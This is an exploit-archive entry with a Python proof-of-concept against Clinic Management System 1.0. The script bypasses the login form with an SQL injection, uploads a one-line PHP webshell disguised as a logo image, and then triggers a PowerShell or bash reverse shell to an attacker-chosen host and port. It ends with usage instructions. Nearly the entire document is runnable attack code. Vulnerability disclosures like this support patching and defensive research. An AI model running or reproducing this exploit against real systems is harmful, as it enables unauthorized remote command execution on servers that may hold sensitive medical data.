Clinic Management System 1.0 - SQL injection to Remote Code Execution

# Exploit Title: Clinic Management System 1.0 - SQL injection to Remote Code Execution
# Date:21/10/2021
# Exploit Author: Pablo Santiago
# Vendor Homepage: https://www.sourcecodester.com/php/14243/open-source-clinic-management-system-php-full-source-code.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/Nikhil_B/clinic-full-source-code-with-database_0.zip
# Version: 1.0
# Tested on: Windows 7 and Ubuntu 21.10
# References: https://medium.com/@Pablo0xSantiago/clinic-management-system-1-0-sql-injection-bypass-to-remote-code-execution-804bceac037e

# Vulnerability: Through SQL injection to bypass the login form it is
# possible to upload a malicious file and after use that malicious file to
# execute code in the remote system.
# Proof of Concept:

import requests
import sys
import time


session = requests.Session()
#http_proxy  = "http://127.0.0.1:8080"
#https_proxy = "https://127.0.0.1:8080"

#proxyDict = {"http"  : http_proxy,
#         "https" : https_proxy}

def windows(HPW,host,shell_name):
payload =
"""powershell+-nop+-c+"$client+%3d+New-Object+System.Net.Sockets.TCPClient("""+HPW+""")%3b$stream+%3d+$client.GetStream()%3b[byte[]]$bytes+%3d+0..65535|%25{0}%3bwhile(($i+%3d+$stream.Read($bytes,+0,+$bytes.Length))+-ne+0){%3b$data+%3d+(New-Object+-TypeName+System.Text.ASCIIEncoding).GetString($bytes,0,+$i)%3b$sendback+%3d+(iex+$data+2>%261+|+Out-String+)%3b$sendback2+%3d+$sendback+%2b+'PS+'+%2b+(pwd).Path+%2b+'>+'%3b$sendbyte+%3d+([text.encoding]%3a%3aASCII).GetBytes($sendback2)%3b$stream.Write($sendbyte,0,$sendbyte.Length)%3b$stream.Flush()}%3b$client.Close()"""""
host2 = host+'/'+'uploadImage/Logo/' + shell_name + '.php?cmd='+payload
#print(payload)
try:
request_rce = requests.get(host2,timeout=8)
except requests.exceptions.ReadTimeout:
pass


def linux(HPL,host,shell_name):
payload = 'bash+-c+"bash+-i+>%26+/dev/tcp/'+HPL+'+0>%261"'
host2 = host+'/'+'/uploadImage/Logo/' + shell_name + '.php?cmd='+payload
#print(payload)
try:
request_rce = requests.get(host2,timeout=8)
except requests.exceptions.ReadTimeout:
pass

def main():

host = sys.argv[1]
shell_name = sys.argv[2]
url = host + '/login.php'
values = {'user': "admin",
 'email': "' OR 1 -- -",
         'password': '',
         'btn_login': ""
         }

r = session.post(url, data=values)
cookie = session.cookies.get_dict()['PHPSESSID']

data = { 'btn_web':''}
headers= {'Cookie': 'PHPSESSID='+cookie}



request = session.post(host+ '/manage_website.php', data=data,
headers=headers,files={"website_image":(shell_name+'.php',"<?=`$_GET[cmd]`?>")})
print("")
print('[*] Your Simple Webshell was uploaded to ' + host +
'/uploadImage/Logo/' + shell_name + '.php' )
print("")
LHOST = input('[+] Enter your LHOST: ')
LPORT = input('[+] Enter your LPORT: ')
print("")
HPW= "'"+LHOST+"'"+','+LPORT
HPL= ""+LHOST+""+'/'+LPORT

print('[+] Option 1: Windows')
print('[+] Option 2: Linux')

option = input('[+] Choose OS: ')

if option == "1":

windows(HPW,host,shell_name)
exit()

elif option == "2":
linux(HPL,host,shell_name)
exit()

else:
print("Please choose Windows or Linux")

main()

#Usage: python3 host shell_name
#Example: python3 http://localhost/clinic shell